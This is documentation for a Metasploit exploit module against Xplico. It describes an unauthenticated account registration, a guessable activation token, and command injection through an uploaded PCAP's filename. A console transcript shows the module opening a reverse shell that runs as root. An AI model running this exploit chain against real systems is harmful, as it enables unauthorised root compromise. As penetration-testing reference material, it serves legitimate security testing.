dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/http/xplico_exec.md

4.6 KiB
Raw Permalink Blame History

Vulnerable Application

This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.

The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try to send e-mail that contains activation code. Unfortunately, this e-mail probably not gonna reach to the given e-mail address on most of installation. But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.

One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum of the file. Name of the for this operation is directly taken from user input and then used at inside of the command without proper input validation.

Vulnerable Application Installation Steps

Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0

http://wiki.xplico.org/doku.php?id=ubuntu

You may also give a try to virtualbox image provided by maintainer of Xplico. I've tested this module against Xplico-1.1.0-ubuntu-13.10-i386.ova. https://sourceforge.net/projects/xplico/files/VirtualBox%20images/

Username of the virtualbox image is "ubuntu" and password is "reverse".

Verification Steps

A successful check of the exploit will look like this:

  • Start msfconsole
  • use exploit/linux/http/securityonion_xplico_exec
  • Set RHOST
  • Set PAYLOAD cmd/unix/reverse_awk
  • Set LHOST
  • Run exploit
  • Verify that you are seeing New user successfully registered in console.
  • Verify that you are seeing User successfully activated in console.
  • Verify that you are seeing Successfully authenticated in console.
  • Verify that you are seeing New Case successfully creted in console.
  • Verify that you are seeing New Sols successfully creted in console.
  • Verify that you are seeing PCAP successfully uploaded. Pcap parser is going to start on server side in console.
  • Verify that you are getting We are at PCAP decoding phase. Little bit more patience... in console.
  • Verify that you have your root shell.

Scenarios

msf > use exploit/linux/http/securityonion_xplico_exec
msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30
RHOST => 12.0.0.30
msf exploit(securityonion_xplico_exec) > 
msf exploit(securityonion_xplico_exec) > exploit 

[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/
set payload cmd/unix/generic         set payload cmd/unix/reverse_netcat
set payload cmd/unix/reverse_awk     
msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk 
payload => cmd/unix/reverse_awk
msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(securityonion_xplico_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Initiating new session on server side
[*] Registering a new user
[+] New user successfully registered
[*] Username: mwbvnyowr
[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT
[*] Calculating em_key code of the user
[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e
[+] User successfully activated
[*] Authenticating with our activated new user
[+] Successfully authenticated
[*] Creating new case
[+] New Case successfully created. Our pol_id = 36
[*] Creating new xplico session for pcap
[+] New Sols successfully created. Our sol_id = 54
[*] Uploading malformed PCAP file
[+] PCAP successfully uploaded. Pcap parser is going to start on server side.
[*] Parsing has started. Wait for parser to get the job done...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[+] We are at PCAP decoding phase. Little bit more patience...
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 +0300

id
uid=0(root) gid=0(root) groups=0(root)